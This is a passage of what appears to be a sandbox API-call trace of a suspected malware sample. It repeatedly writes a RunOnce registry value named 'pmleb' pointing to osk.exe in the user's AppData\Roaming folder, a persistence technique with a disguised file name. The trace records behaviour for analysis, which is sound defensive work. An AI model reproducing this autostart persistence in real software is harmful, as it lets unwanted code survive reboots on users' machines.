lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.146] RegCloseKey (hKey=0x280) returned 0x0 [0100.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.147] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.147] SetTimer (hWnd=0x20280, nIDEvent=0x2348, uElapse=0xa, lpTimerFunc=0x0) returned 0x2348 [0100.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.157] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.157] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.158] KillTimer (hWnd=0x20280, uIDEvent=0x2348) returned 1 [0100.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.159] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.159] RegCloseKey (hKey=0x280) returned 0x0 [0100.159] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.159] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.159] SetTimer (hWnd=0x20280, nIDEvent=0x2349, uElapse=0xa, lpTimerFunc=0x0) returned 0x2349 [0100.159] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.173] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.173] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.174] KillTimer (hWnd=0x20280, uIDEvent=0x2349) returned 1 [0100.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.174] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.174] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.175] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.175] RegCloseKey (hKey=0x280) returned 0x0 [0100.175] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.175] SetTimer (hWnd=0x20280, nIDEvent=0x234a, uElapse=0xa, lpTimerFunc=0x0) returned 0x234a [0100.175] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.189] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.189] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.189] KillTimer (hWnd=0x20280, uIDEvent=0x234a) returned 1 [0100.189] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.190] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.190] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.190] RegCloseKey (hKey=0x280) returned 0x0 [0100.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.190] SetTimer (hWnd=0x20280, nIDEvent=0x234b, uElapse=0xa, lpTimerFunc=0x0) returned 0x234b [0100.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.204] KillTimer (hWnd=0x20280, uIDEvent=0x234b) returned 1 [0100.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.206] RegCloseKey (hKey=0x280) returned 0x0 [0100.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.206] SetTimer (hWnd=0x20280, nIDEvent=0x234c, uElapse=0xa, lpTimerFunc=0x0) returned 0x234c 
[0100.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.220] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.220] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.221] KillTimer (hWnd=0x20280, uIDEvent=0x234c) returned 1 [0100.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.222] RegCloseKey (hKey=0x280) returned 0x0 [0100.222] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.222] SetTimer (hWnd=0x20280, nIDEvent=0x234d, uElapse=0xa, lpTimerFunc=0x0) returned 0x234d [0100.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.246] KillTimer (hWnd=0x20280, uIDEvent=0x234d) returned 1 [0100.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.246] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.247] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.247] RegCloseKey (hKey=0x280) returned 0x0 [0100.247] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.247] SetTimer (hWnd=0x20280, nIDEvent=0x234e, uElapse=0xa, lpTimerFunc=0x0) returned 0x234e [0100.247] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.251] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.251] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.251] KillTimer (hWnd=0x20280, uIDEvent=0x234e) returned 1 [0100.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.252] RegCloseKey (hKey=0x280) returned 0x0 [0100.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.253] SetTimer (hWnd=0x20280, nIDEvent=0x234f, uElapse=0xa, lpTimerFunc=0x0) returned 0x234f [0100.253] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0100.267] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.267] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.267] KillTimer (hWnd=0x20280, uIDEvent=0x234f) returned 1 [0100.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.268] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.268] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.268] RegCloseKey (hKey=0x280) returned 0x0 [0100.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.268] SetTimer (hWnd=0x20280, nIDEvent=0x2350, uElapse=0xa, lpTimerFunc=0x0) returned 0x2350 [0100.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.283] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.283] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.283] KillTimer (hWnd=0x20280, uIDEvent=0x2350) returned 1 [0100.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.284] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.284] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.284] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.284] RegCloseKey (hKey=0x280) returned 0x0 [0100.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.285] SetTimer (hWnd=0x20280, nIDEvent=0x2351, uElapse=0xa, lpTimerFunc=0x0) returned 0x2351 [0100.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.298] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.298] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.298] KillTimer (hWnd=0x20280, uIDEvent=0x2351) returned 1 [0100.298] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.299] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.299] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.299] RegCloseKey (hKey=0x280) returned 0x0 [0100.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.299] SetTimer (hWnd=0x20280, nIDEvent=0x2352, uElapse=0xa, lpTimerFunc=0x0) returned 0x2352 [0100.300] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.313] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.313] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.314] KillTimer (hWnd=0x20280, uIDEvent=0x2352) returned 1 [0100.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.314] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.314] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.315] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.315] RegCloseKey (hKey=0x280) returned 0x0 [0100.315] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.315] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.315] SetTimer (hWnd=0x20280, nIDEvent=0x2353, uElapse=0xa, lpTimerFunc=0x0) returned 0x2353 [0100.315] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.330] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.330] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.330] KillTimer (hWnd=0x20280, uIDEvent=0x2353) returned 1 [0100.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.331] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.331] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.331] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.331] RegCloseKey (hKey=0x280) returned 0x0 [0100.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.332] SetTimer (hWnd=0x20280, nIDEvent=0x2354, uElapse=0xa, lpTimerFunc=0x0) returned 0x2354 [0100.332] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.345] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.345] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.345] KillTimer (hWnd=0x20280, uIDEvent=0x2354) returned 1 [0100.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.346] RegCloseKey (hKey=0x280) returned 0x0 [0100.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.346] SetTimer (hWnd=0x20280, nIDEvent=0x2355, uElapse=0xa, lpTimerFunc=0x0) returned 0x2355 [0100.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.360] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.360] KillTimer (hWnd=0x20280, 
uIDEvent=0x2355) returned 1 [0100.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.362] RegCloseKey (hKey=0x280) returned 0x0 [0100.362] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.362] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.362] SetTimer (hWnd=0x20280, nIDEvent=0x2356, uElapse=0xa, lpTimerFunc=0x0) returned 0x2356 [0100.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.398] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.398] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.398] KillTimer (hWnd=0x20280, uIDEvent=0x2356) returned 1 [0100.398] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.399] RegCloseKey (hKey=0x280) returned 0x0 [0100.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.399] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.400] SetTimer (hWnd=0x20280, nIDEvent=0x2357, uElapse=0xa, lpTimerFunc=0x0) returned 0x2357 [0100.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.407] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.407] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.407] KillTimer (hWnd=0x20280, uIDEvent=0x2357) returned 1 [0100.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.409] RegCloseKey (hKey=0x280) returned 0x0 [0100.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.409] SetTimer (hWnd=0x20280, nIDEvent=0x2358, uElapse=0xa, lpTimerFunc=0x0) returned 0x2358 [0100.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.423] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.423] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.423] KillTimer (hWnd=0x20280, uIDEvent=0x2358) returned 1 [0100.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.424] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.424] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.425] RegCloseKey (hKey=0x280) returned 0x0 [0100.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.425] SetTimer (hWnd=0x20280, nIDEvent=0x2359, uElapse=0xa, lpTimerFunc=0x0) returned 0x2359 [0100.425] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.439] KillTimer (hWnd=0x20280, uIDEvent=0x2359) returned 1 [0100.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.439] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.439] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.440] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.440] RegCloseKey (hKey=0x280) returned 0x0 
